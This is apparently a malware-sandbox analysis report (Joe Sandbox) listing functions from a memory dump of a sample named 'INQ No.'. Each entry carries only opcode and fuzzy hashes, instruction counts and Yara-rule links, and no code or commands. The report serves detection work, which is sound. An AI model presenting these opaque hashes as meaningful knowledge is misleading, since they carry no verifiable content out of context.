                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                                                                                                            • Instruction ID: 5a46e7c542691cf9248347ea75ca38ca0807a7c839bfbb20d760cda956d683e0
                                                                                                                                                                            • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                                                                                                            • Instruction Fuzzy Hash: 9C41B375F00205ABEF14DF99CC85AAFB7BAAF89790F244069E805E7341DE74DE029760
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 00ED0887 Relevance: .1, Instructions: 128COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 0da49166417658df747df0265472daf1c364c012105a9f930a1ff40af85c8752
                                                                                                                                                                            • Instruction ID: 78d5a6ca5d539048db16dc66ed4eea0adc902eab817023aa857f1995d84ac0c1
                                                                                                                                                                            • Opcode Fuzzy Hash: 0da49166417658df747df0265472daf1c364c012105a9f930a1ff40af85c8752
                                                                                                                                                                            • Instruction Fuzzy Hash: 9541F4B06007059FD324CF25C890A62B7F8FFC8318F286A6EE54697B51E730E846DB90
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 00EFA470 Relevance: .1, Instructions: 127COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: d67ef77dc513b78ba8d98b0ce4fec6f77fc250b7a1967d2ba0d6dabea1470e73
                                                                                                                                                                            • Instruction ID: a5c212481d376424bc9b6e808b33f8eed78aa17e2a0ddf054f1a67a4fc64a67a
                                                                                                                                                                            • Opcode Fuzzy Hash: d67ef77dc513b78ba8d98b0ce4fec6f77fc250b7a1967d2ba0d6dabea1470e73
                                                                                                                                                                            • Instruction Fuzzy Hash: 50419EB2A4020CCFCB11DF68D991BF977B0BF08364F1821A9D515BB291DB74A940EBA1
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 00ED8BF0 Relevance: .1, Instructions: 124COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 49985194a46bcf0ce3030b3184c4b80fb9da68c8d3280299e13944298a52d7eb
                                                                                                                                                                            • Instruction ID: fb3d35655e17ae08c5c9a8813fee61fc953c92b77baf791c9633da7eb9ecb5b9
                                                                                                                                                                            • Opcode Fuzzy Hash: 49985194a46bcf0ce3030b3184c4b80fb9da68c8d3280299e13944298a52d7eb
                                                                                                                                                                            • Instruction Fuzzy Hash: 4741F432911209CBC714DF48CA51AAAB7F6FB84714F24902FE401AB3A1CB35EC42DBA0
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 00EC8918 Relevance: .1, Instructions: 123COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 678f9197ddbe902adb9e2d680072801ea955588aa2dded0e5ceb48f0ff1b6b33
                                                                                                                                                                            • Instruction ID: 40ff7963d5cde53b73977c571266fb7741f280f606855fda7e867483ca5873f0
                                                                                                                                                                            • Opcode Fuzzy Hash: 678f9197ddbe902adb9e2d680072801ea955588aa2dded0e5ceb48f0ff1b6b33
                                                                                                                                                                            • Instruction Fuzzy Hash: C9418C315083169ED311DF649A41BABB7E8AFC4B54F40092EF984E7260EB31DE159BA3
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 00ECA020 Relevance: .1, Instructions: 122COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                                                                                                            • Instruction ID: c4a337283b4fda056d34164a0308c06bcbf8ccdc5f8a51760ba8c86e41633e7a
                                                                                                                                                                            • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                                                                                                            • Instruction Fuzzy Hash: 06416E31E00229DBCB10DE949A51FBAB3B1EB507ACF19807EED40AB241D7338D41E792
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 00ED09AD Relevance: .1, Instructions: 122COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 9eff523e45926b10f61305ac6b838811f77008a9539531c64ca557925252facc
                                                                                                                                                                            • Instruction ID: aa38603f279230dff47143460f3bb1f1de6ebead85d353dcad4a89f4c84fa4c6
                                                                                                                                                                            • Opcode Fuzzy Hash: 9eff523e45926b10f61305ac6b838811f77008a9539531c64ca557925252facc
                                                                                                                                                                            • Instruction Fuzzy Hash: A1415771640700EFD721CF19D841B66BBE4EF88318F28956AE449AB351E771ED42CB91
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 00F00710 Relevance: .1, Instructions: 121COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                                                                                                                            • Instruction ID: 4cda3922a50cedc0b444caae0e9319169108fed7285b3eb85ee7057810ec1572
                                                                                                                                                                            • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                                                                                                                            • Instruction Fuzzy Hash: 8241F771A00605EFDB24CF99C980BAAB7F4FF18710F20896DE556E7691D730AA44EF90
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 00ED262C Relevance: .1, Instructions: 119COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 7b294feea7a923e275b188bdc04c99348a8a484ca58aaa9d206409690135f83e
                                                                                                                                                                            • Instruction ID: ac7b11ecb74f6e61714ec628890d4d026633eb5e890d653100b90bdbee1077bd
                                                                                                                                                                            • Opcode Fuzzy Hash: 7b294feea7a923e275b188bdc04c99348a8a484ca58aaa9d206409690135f83e
                                                                                                                                                                            • Instruction Fuzzy Hash: 1D417B71505704CFCB21EF24C901B69B7F1EF68314F1492AED616AB3A2DB309942EB51
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 00F0C8F9 Relevance: .1, Instructions: 116COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: f4ceee612821a260a1da78bd349a290b795d3cc067736f15573d19bd7c3eb37f
                                                                                                                                                                            • Instruction ID: b78a0ba3b7ef5cb88d0792a19480ce189f4c8c72f4caaa94434facded1ca90a2
                                                                                                                                                                            • Opcode Fuzzy Hash: f4ceee612821a260a1da78bd349a290b795d3cc067736f15573d19bd7c3eb37f
                                                                                                                                                                            • Instruction Fuzzy Hash: F8318CB2A00745DFDB11CF58C441799BBF0FF09724F2181AAE419EB291D7769902EF90
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 00F507C3 Relevance: .1, Instructions: 114COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 69a4cd1928c6e13900d91b3347b92bcfd4bbc2daa090096ee3c692dc3df3eb8d
                                                                                                                                                                            • Instruction ID: dab3613e64146f53a2b420a85a8d499ccbf6b1b558b884a88e700c6feabc4a3f
                                                                                                                                                                            • Opcode Fuzzy Hash: 69a4cd1928c6e13900d91b3347b92bcfd4bbc2daa090096ee3c692dc3df3eb8d
                                                                                                                                                                            • Instruction Fuzzy Hash: 5F4190725083059FD320DF24C845F9BBBE8FF88761F104A2AF998D7291DB709805DB92
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 00F505A7 Relevance: .1, Instructions: 111COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 1b0d5eefee4f55113248e0eac5799ff354d2275ff6a636eb2686129db1b8a0cf
                                                                                                                                                                            • Instruction ID: b3328b7c1da9065777e58c27c1430b4bca4053d4658e70318bd3bd91cd99ade2
                                                                                                                                                                            • Opcode Fuzzy Hash: 1b0d5eefee4f55113248e0eac5799ff354d2275ff6a636eb2686129db1b8a0cf
                                                                                                                                                                            • Instruction Fuzzy Hash: E541D272A046459FC320DF68C841BAAB3E9FFC8711F04062DF99497691EB34ED18D7A6
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 00ED4859 Relevance: .1, Instructions: 111COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: c17d29213f90e051f2c676e9868029f2e42284a73c5391efa0c36881ae593c04
                                                                                                                                                                            • Instruction ID: 78aaf19734f4f1e77d6443d6447bba035dfd4aa8e56ae2169382ce4f0614688a
                                                                                                                                                                            • Opcode Fuzzy Hash: c17d29213f90e051f2c676e9868029f2e42284a73c5391efa0c36881ae593c04
                                                                                                                                                                            • Instruction Fuzzy Hash: 8341CEB02043068BC725CF29D8A4B2BB7E9EFE0358F14542EE585AB3E1DB70D942CB51
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 00EE02E1 Relevance: .1, Instructions: 106COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                                                                                                                            • Instruction ID: fe5337ee5ec19751e64ff0dd4370e311b37d18fd5ae518cc300a3d4609775825
                                                                                                                                                                            • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                                                                                                                            • Instruction Fuzzy Hash: DF314A31A00288AFDB11DB69CC44BDEBBE9EF04350F085166F455E7352C3B4D884CB64
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 00F7E3DB Relevance: .1, Instructions: 105COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: a22098fa1b5640481e75659ddde7aaa4ec486987a83f445eb48fef8bd3c53e6b
                                                                                                                                                                            • Instruction ID: 713bc4dfb186945e80fafd5e47a90b8fd469da851dfc1003ceb1712106722c67
                                                                                                                                                                            • Opcode Fuzzy Hash: a22098fa1b5640481e75659ddde7aaa4ec486987a83f445eb48fef8bd3c53e6b
                                                                                                                                                                            • Instruction Fuzzy Hash: 3431C635740759ABDB22EF658C41F6B76E8AB48B50F10406AF604BB2D1CAA4DD00D7A1
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 00F84B4B Relevance: .1, Instructions: 104COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 7f3c7047b8e64574b18e26918d2ccf86cc3b1512930f62aecc9b87b2b95b7f9c
                                                                                                                                                                            • Instruction ID: 71eae4173023344d2bf0e950ad6d38504f71c5d4f61fb8e3d17de6a81da2c55c
                                                                                                                                                                            • Opcode Fuzzy Hash: 7f3c7047b8e64574b18e26918d2ccf86cc3b1512930f62aecc9b87b2b95b7f9c
                                                                                                                                                                            • Instruction Fuzzy Hash: 4E31C13270A2068FC720EF19D981EA6B7E9FF85360F05446EE8959B261D731FC05EB91
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 00F84BB0 Relevance: .1, Instructions: 101COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 2cb72e08467eacd14b1127685ed9839c048a34cae933a6fd664aa5dfbd628f82
                                                                                                                                                                            • Instruction ID: 65532de110252fddf483c2e188da139a92b5faaf5b3f8a54ec74cda802cec28f
                                                                                                                                                                            • Opcode Fuzzy Hash: 2cb72e08467eacd14b1127685ed9839c048a34cae933a6fd664aa5dfbd628f82
                                                                                                                                                                            • Instruction Fuzzy Hash: 61316B717092028FC720EF29C981EAAB3E9FB85720F15456DF995DB291E730EC04EB91
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 00F4EB1D Relevance: .1, Instructions: 100COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: f087bdc0504680a7c9d685d20fbe0f726cff12ec228125a1d027e524569b8322
                                                                                                                                                                            • Instruction ID: 36efff889c78695aeaf2f6ab2d81ca90458ce7b82f2ad0134fe5683d6ee2fdd8
                                                                                                                                                                            • Opcode Fuzzy Hash: f087bdc0504680a7c9d685d20fbe0f726cff12ec228125a1d027e524569b8322
                                                                                                                                                                            • Instruction Fuzzy Hash: F031D332B016C99BE3325769CD89F657BD8FF80B54F1D04B0AE459B6D2EB28DC40E220
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 00F961C3 Relevance: .1, Instructions: 97COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 659529337ef01173714bf90dfd88387c5ffd710e99d3313c78f7b887645c10f1
                                                                                                                                                                            • Instruction ID: 2779012cb58017688af63b73dacc661b7e3240311861d060899fb6abf74c18cf
                                                                                                                                                                            • Opcode Fuzzy Hash: 659529337ef01173714bf90dfd88387c5ffd710e99d3313c78f7b887645c10f1
                                                                                                                                                                            • Instruction Fuzzy Hash: 2B31D076E00259ABEF15DFA8CD41FAEB3B5EB48B40F514169E900EB284D770ED40DBA4
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 00F7483A Relevance: .1, Instructions: 96COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 6b7792cc58cf97f611a49d464025d541f6a2584579fb4c2884355e914f5a3457
                                                                                                                                                                            • Instruction ID: 61219d190d6a53297e159660804c6f5bc4c90c4145c09ecb091a1c38c7d81f53
                                                                                                                                                                            • Opcode Fuzzy Hash: 6b7792cc58cf97f611a49d464025d541f6a2584579fb4c2884355e914f5a3457
                                                                                                                                                                            • Instruction Fuzzy Hash: DA317276A4012CABCB21DF54DD85BDEB7FAAB98350F1140A6B508A7250CB30EE91DF91
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 00EFEB20 Relevance: .1, Instructions: 96COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: ff0af02aefc4220bbc80341be1428ae7ff1e44d1b862703d6f69f70e092ab2b7
                                                                                                                                                                            • Instruction ID: 8c150e529693c8cb890093baeb16eebb0fa12a9a511f2f99efd5c84cb12acff5
                                                                                                                                                                            • Opcode Fuzzy Hash: ff0af02aefc4220bbc80341be1428ae7ff1e44d1b862703d6f69f70e092ab2b7
                                                                                                                                                                            • Instruction Fuzzy Hash: C831A172E00218AFCB31DFA9CD40AAEB7F9EF04760F114466E956F7260D670AE009B90
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 00F960B8 Relevance: .1, Instructions: 95COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: fef187bf9926e417defd9751613683c902a43142baa06d1b8de3e0a21f3f88eb
                                                                                                                                                                            • Instruction ID: 163f38eb606d4b0eb5b15caee710d1d93296f7e76efbb6d5ba64fd6bcdf03892
                                                                                                                                                                            • Opcode Fuzzy Hash: fef187bf9926e417defd9751613683c902a43142baa06d1b8de3e0a21f3f88eb
                                                                                                                                                                            • Instruction Fuzzy Hash: 89312432A00605ABEB129FA9CC51B6AB7E9AF84754F10006DF505EB392DA30DD41AB90
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 00ED07AF Relevance: .1, Instructions: 95COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 3e2c179d0aa0794bb3cc7dc125779434da397c8978d0162ce038b29041f04741
                                                                                                                                                                            • Instruction ID: 9188ecbb29d8263defa1b886a6201ad9c6a42d7a9943f9db40a4908ba6e60d59
                                                                                                                                                                            • Opcode Fuzzy Hash: 3e2c179d0aa0794bb3cc7dc125779434da397c8978d0162ce038b29041f04741
                                                                                                                                                                            • Instruction Fuzzy Hash: CE31EF36A043119BC71ADE648880FABBBE5EB94360F19542AFC55B7311DA30DC02A7E1
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 00ED8550 Relevance: .1, Instructions: 94COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: a5bbdcc4d4e58e8e0845abf5592210e8d33d9b5fe094b2d8b984836e774b6065
                                                                                                                                                                            • Instruction ID: 7331436545068cfe47ae4c131d2eba607f5d44488a4fb368fbadd06a63298b4a
                                                                                                                                                                            • Opcode Fuzzy Hash: a5bbdcc4d4e58e8e0845abf5592210e8d33d9b5fe094b2d8b984836e774b6065
                                                                                                                                                                            • Instruction Fuzzy Hash: 4D318CB2A093018FD764CF19D940B2AB7E4FB88724F19496EF884AB351D771EC48DB91
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 00F0A6C7 Relevance: .1, Instructions: 92COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                                                                                                                            • Instruction ID: c272c2ee0931fc7fc42bb75a3f958d43a54e2715a955c1ded734982444d1067a
                                                                                                                                                                            • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                                                                                                                            • Instruction Fuzzy Hash: 89313E72B00B00AFD764CF69CE41B57B7F8BF08B60F14452DA59AC3690E630E900EB61
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 00F7EBD0 Relevance: .1, Instructions: 91COMMON
